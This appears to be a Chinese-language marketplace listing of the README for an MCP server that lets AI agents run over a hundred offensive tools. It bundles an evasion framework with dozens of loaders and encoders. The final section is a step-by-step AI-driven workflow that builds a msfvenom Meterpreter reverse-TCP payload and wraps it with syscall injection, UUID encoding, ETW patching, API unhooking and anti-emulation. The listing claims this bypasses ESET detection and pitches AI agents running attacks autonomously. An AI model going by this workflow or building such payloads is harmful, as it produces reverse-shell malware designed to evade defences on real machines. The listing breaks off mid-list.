返回市场
红队六边打击

红队六边打击

作者:Yenn50323 星标更新:2025-10-26

项目介绍

<div align="center"> <img src="assets/REDTEAM.png" alt="HexStrike RedTeam Logo" width="400" style="margin-bottom: 20px;"/>

HexStrike AI RED-TEAM

基于AI的MCP网络安全自动化平台,集成BOAZ红队负载规避

Python License

高级AI驱动的渗透测试MCP框架,配备127种安全工具(53种自动安装),12种以上自主AI代理,以及BOAZ红队负载规避(77种以上加载器,12种编码器)

📋 新功能🏗️ 架构概述🚀 安装🛠️ 功能🤖 AI代理📡 API参考

</div>

架构概述

HexStrike AI MCP v6.0 特征多代理架构,包括自主AI代理、智能决策和漏洞情报。

%%{init: {"themeVariables": {
  "primaryColor": "#b71c1c",
  "secondaryColor": "#ff5252",
  "tertiaryColor": "#ff8a80",
  "background": "#2d0000",
  "edgeLabelBackground":"#b71c11c",
  "fontFamily": "monospace",
  "fontSize": "16px",
  "fontColor": "#fffde7",
  "nodeTextColor": "#fffde7"
}}}%%
graph TD
    A[AI代理 - Claude/GPT/Copilot] -->|MCP协议| B[HexStrike MCP服务器v6.0]

    B --> C[智能决策引擎]
    B --> D[12种以上自主AI代理]
    B --> E[现代视觉引擎]
    B --> BOAZ[BOAZ负载引擎]

    C --> F[工具选择AI]
    C --> G[参数优化]
    C --> H[攻击链发现]

    D --> I[漏洞赏金代理]
    D --> J[CTF解题代理]
    D --> K[CVE情报代理]
    D --> L[利用生成代理]

    E --> M[实时仪表板]
    E --> N[进度可视化]
    E --> O[漏洞卡片]

    BOAZ --> BOAZ1[77种以上进程注入加载器]
    BOAZ --> BOAZ2[12种编码方案]
    BOAZ --> BOAZ3[EDR/AV规避]
    BOAZ1 --> BOAZ4[系统调用/隐身/无线程]
    BOAZ2 --> BOAZ5[AES/ChaCha20/UUID/XOR]
    BOAZ3 --> BOAZ6[API解除挂钩/ETW修补]

    B --> P[127种安全工具 - 53种自动安装]
    P --> Q[网络工具 - 10种]
    P --> R[Web应用工具 - 19种]
    P --> S[云工具 - 10种]
    P --> T[二进制工具 - 13种]
    P --> U[CTF工具 - 10种]
    P --> V[OSINT工具 - 13种]

    B --> W[高级进程管理]
    W --> X[智能缓存]
    W --> Y[资源优化]
    W --> Z[错误恢复]

    style A fill:#b71c1c,stroke:#ff5252,stroke-width:3px,color:#fffde7
    style B fill:#ff5252,stroke:#b71c1c,stroke-width:4px,color:#fffde7
    style C fill:#ff8a80,stroke:#b71c1c,stroke-width:2px,color:#fffde7
    style D fill:#ff8a80,stroke:#b71c1c,stroke-width:2px,color:#fffde7
    style E fill:#ff8a80,stroke:#b71c1c,stroke-width:2px,color:#fffde7
    style BOAZ fill:#d32f2f,stroke:#b71c1c,stroke-width:3px,color:#fffde7

工作原理

  1. AI代理连接 - Claude、GPT或其他兼容MCP的代理通过FastMCP协议连接
  2. 智能分析 - 决策引擎分析目标并选择最优测试策略
  3. 自主执行 - AI代理使用150多种工具进行全面的安全评估
  4. 实时适应 - 系统根据结果和发现的漏洞进行调整
  5. BOAZ负载生成 - 使用77种以上加载器、12种编码器和EDR/AV绕过进行高级负载规避
  6. 高级报告 - 包含漏洞卡片和风险分析的可视化输出

安装

快速设置以运行hexstrike MCP服务器

# 1. 克隆仓库
git clone https://github.com/Yenn503/Hexstrike-redteam.git hexstrike-ai
cd hexstrike-ai

# 2. 创建虚拟环境
python3 -m venv hexstrike-env
source hexstrike-env/bin/activate  # Linux/Mac
# hexstrike-env\Scripts\activate   # Windows

# 3. 安装Python依赖
pip3 install -r requirements.txt

# 4. **必需:安装BOAZ系统依赖**
# 此步骤对于BOAZ负载生成工作是强制性的
# 安装MinGW、NASM、Wine、LLVM混淆器(Akira/Pluto)和构建工具
cd BOAZ_beta
bash requirements.sh
cd ..

# 脚本将:
# - 安装MinGW交叉编译器(x86_64-w64-mingw32-g++)
# - 安装NASM汇编器
# - 安装Wine(用于测试Windows二进制文件)
# - 构建Akira LLVM混淆器(约30分钟编译时间)
# - 构建Pluto LLVM混淆器(约20分钟编译时间)
# - 安装签名工具(Mangle、pyMetaTwin)
# - 安装SysWhispers2以生成系统调用
# **注意**:这可能需要一段时间,具体取决于您的系统。当提示时,请回答'y'。

各种AI客户端的安装和设置指南:

安装及演示视频

观看完整的安装和设置教程:YouTube - HexStrike AI安装及演示

支持的AI客户端用于运行和集成

您可以安装并运行各种AI客户端上的HexStrike AI MCP,包括:

  • 5ire(最新版本v0.14.0目前不支持)
  • VS Code Copilot
  • Roo Code
  • Cursor
  • Claude Desktop
  • 任何兼容MCP的代理

请参阅上述视频中的逐步说明和这些平台的集成示例。

安装安全工具

自动化安装(推荐):

运行安装脚本来自动安装53种基本安全工具

cd install
sudo ./install_all.sh

这将安装:

  • 系统依赖项(MinGW、Wine、NASM、构建工具)
  • 70多种安全工具(当前53种有效,详见以下分解)
  • 包含所有依赖项的Python虚拟环境
  • BOAZ LLVM混淆器(Akira + Pluto)
  • 针对Claude Desktop/CLI的MCP配置

自动安装的内容(53种工具):

<details> <summary><b>✓ 网络与侦察(10种工具)</b></summary>
  • nmap, masscan, rustscan, amass, subfinder, nuclei
  • autorecon, theharvester, responder, netexec, enum4linux-ng
</details> <details> <summary><b>✓ Web应用安全(19种工具)</b></summary>
  • gobuster, feroxbuster, ffuf, nikto, sqlmap, wpscan
  • httpx, hakrawler, arjun, wafw00f, dalfox
  • gau, waybackurls, paramspider, anew, sublist3r
  • jwt-tool, testssl.sh, commix, nosqlmap
</details> <details> <summary><b>✓ 密码与认证(5种工具)</b></summary>
  • hydra, john, hashcat, evil-winrm, hashid
</details> <details> <summary><b>✓ 二进制分析与RE(13种工具)</b></summary>
  • gdb, radare2, binwalk, ghidra(仅JDK),checksec
  • strings, objdump, volatility3, ropgadget, one-gadget
  • pwninit, angr, pwntools
</details> <details> <summary><b>✓ 法医(16种工具)</b></summary>
  • foremost, testdisk, steghide, exiftool, scalpel
  • sleuthkit, stegsolve, zsteg, photorec, volatility3
</details> <details> <summary><b>✓ OSINT与情报(13种工具)</b></summary>
  • sherlock, recon-ng, spiderfoot, trufflehog
  • amass, subfinder, theharvester, shodan-cli
</details> <details> <summary><b>✓ 云安全(10种工具)</b></summary>
  • prowler, trivy, aws-cli, azure-cli, gcloud, kubectl
  • docker-bench-security
</details> <details> <summary><b>✓ Metasploit框架</b></summary>
  • msfconsole, msfvenom, searchsploit(exploit-db)
</details> </details>

需要手动安装的工具(74种工具):

由于许可证、依赖项或系统要求,一些专用工具需要手动安装:

  • 无线:aircrack-ng套件、kismet、wireshark、tshark
  • :kube-hunter、kube-bench、scout-suite、checkov、terrascan、falco、clair
  • Web:dirsearch、dirb、burp套件、zaproxy、jaeles、x8、wfuzz、xsser
  • 密码:medusa、patator、crackmapexec、ophcrack、hashcat-utils、hashpump
  • 二进制:ropper、libc-database
  • OSINT:maltego、censys-cli、have-i-been-pwned、social-analyzer
  • 网络:arp-scan、nbtscan、rpcclient、smbmap、enum4linux(经典)、fierce、dnsenum、tshark
  • API:insomnia、postman、httpie
  • 法医:autopsy、bulk-extractor、outguess
  • 其他:qsreplace、uro

安装注意事项:

  • 安装脚本适用于任何Linux系统(便携路径)
  • 没有硬编码用户路径 - 所有用户都适用
  • 某些工具可能在某些发行版上失败(包含回退选项)
  • 完整安装大约需要60-90分钟(LLVM编译)
  • 需要约24GB磁盘空间
  • 请参阅install/README.md以获取故障排除信息

浏览器代理需求:

# Chrome/Chromium用于浏览器代理
sudo apt install chromium-browser chromium-chromedriver
# 或安装Google Chrome
wget -q -O - https://dl.google.com/linux/linux_signing_key.pub | sudo apt-key add -
echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" | sudo tee /etc/apt/sources.list.d/google-chrome.list
sudo apt update && sudo apt install google-chrome-stable

启动服务器

# 启动MCP服务器
python3 hexstrike_server.py

# 可选:启动调试模式
python3 hexstrike_server.py --debug

# 可选:自定义端口配置
python3 hexstrike_server.py --port 8888

验证安装

# 测试服务器健康状况
curl http://localhost:8888/health

# 测试AI代理能力
curl -X POST http://localhost:8888/api/intelligence/analyze-target \
  -H "Content-Type: application/json" \
  -d '{"target": "example.com", "analysis_type": "comprehensive"}'

AI客户端集成设置

Claude Desktop集成或Cursor

编辑~/.config/Claude/claude_desktop_config.json

{
  "mcpServers": {
    "hexstrike-ai": {
      "command": "python3",
      "args": [
        "/path/to/hexstrike-ai/hexstrike_mcp.py",
        "--server",
        "http://localhost:8888"
      ],
      "description": "HexStrike AI v6.0 - 高级网络安全自动化平台",
      "timeout": 300,
      "disabled": false
    }
  }
}

VS Code Copilot集成

.vscode/settings.json中配置VS Code设置:

{
  "servers": {
    "hexstrike": {
      "type": "stdio",
      "command": "python3",
      "args": [
        "/path/to/hexstrike-ai/hexstrike_mcp.py",
        "--server",
        "http://localhost:8888"
      ]
    }
  },
  "inputs": []
}

🔥 BOAZ红队集成

HexStrike现在包括BOAZ,一个用于红队操作的高级负载规避框架:

BOAZ特性

  • 77种以上进程注入加载器 - 系统调用、隐身、内存保护、无线程和VEH/VCH技术
  • 12种编码方案 - AES、ChaCha20、UUID、XOR、MAC、RC4等
  • EDR/AV规避 - API解除挂钩、ETW修补、LLVM混淆(Akira/Pluto)
  • 反分析 - 反仿真检查、睡眠混淆、熵减少
  • 二进制分析 - 熵分析和优化以逃避启发式检测

BOAZ功能演示

<div align="center">

EDR/AV绕过演示

BOAZ生成的有效负载成功绕过了ESET Smart Security Premium

<img src="assets/EDRbypass.png" alt="BOAZ EDR绕过" width="800"/>

具有隐身注入技术的有效负载绕过了实时保护,并保持了低检测配置文件


MSFVenom有效负载混淆

完整流程:MSFVenom生成 → BOAZ规避 → 企业级隐身有效负载

<img src="assets/Hex-Boaz.png" alt="BOAZ MSFVenom混淆" width="900"/>

展示了BOAZ如何将标准MSFVenom有效负载转换为复杂的规避二进制文件,包括:

  • 加载器#16(标准隐身注入)
  • UUID编码(低熵,看起来合法的格式)
  • ETW绕过(Windows事件跟踪修补)
  • 反仿真(沙箱检测)
  • 熵:6.06/8(非常适合绕过启发式分析)
</div>

BOAZ MCP工具

关键工作流(文件必须位于BOAZ_beta目录中):

# 第一步:询问用户需要哪种规避
# 用户:“我需要绕过EDR用户层钩子”

# 第二步:列出系统调用加载器(绕过EDR钩子)
boaz_list_loaders(category="syscall")
# 返回带有直接系统调用技术的加载器1-11

# 第三步:使用MSFVenom生成初始有效负载
msfvenom_scan(
    payload="windows/x64/meterpreter/reverse_tcp",
    lhost="192.168.1.100",
    lport=4444,
    output="payload.exe"  # 创建payload.exe
)

# 第四步:将有效负载移动到BOAZ_beta目录(必需!)
# 手动运行:cp payload.exe BOAZ_beta/

# 第五步:使用适当的加载器应用BOAZ规避
result = boaz_generate_payload(
    input_file="payload.exe",          # BOAZ_beta/内的文件
    output_file="output/evasive.exe",  # 将位于BOAZ_beta/output/
    loader=3,                           # Sifu系统调用(直接系统调用)
    encoding="uuid",                    # UUID编码
    anti_emulation=True,                # 绕过沙箱
    etw=True,                           # ETW修补
    api_unhooking=True,                 # API解除挂钩
    sleep=True                          # 睡眠规避
)

# 第六步:检查结果并找到有效负载
# 如果result['success'] == True:
#   - 有效负载位于:result['output_path'](完整的绝对路径)
#   - 示例:/path/to/hexstrike-ai/BOAZ_beta/output/evasive.exe
#   - 文件大小:result['file_size'](通常约为500KB,高度混淆)
# 如果result['success'] == False:
#   - 尝试同一类别的其他加载器
#   - 检查result['error']和result['stderr']以获取编译错误

其他BOAZ工具:

# 列出可用加载器类别
boaz_list_loaders(category="stealth")

# 分析二进制熵
boaz_analyze_binary(file_path="payload.exe")  # 必须在BOAZ_beta/

# 列出编码方案
boaz_list_encoders()

# 验证配置
boaz_validate_options(loader=16, encoding="uuid")

重要注意事项:

  • 根据规避需求选择加载器,而不是可靠性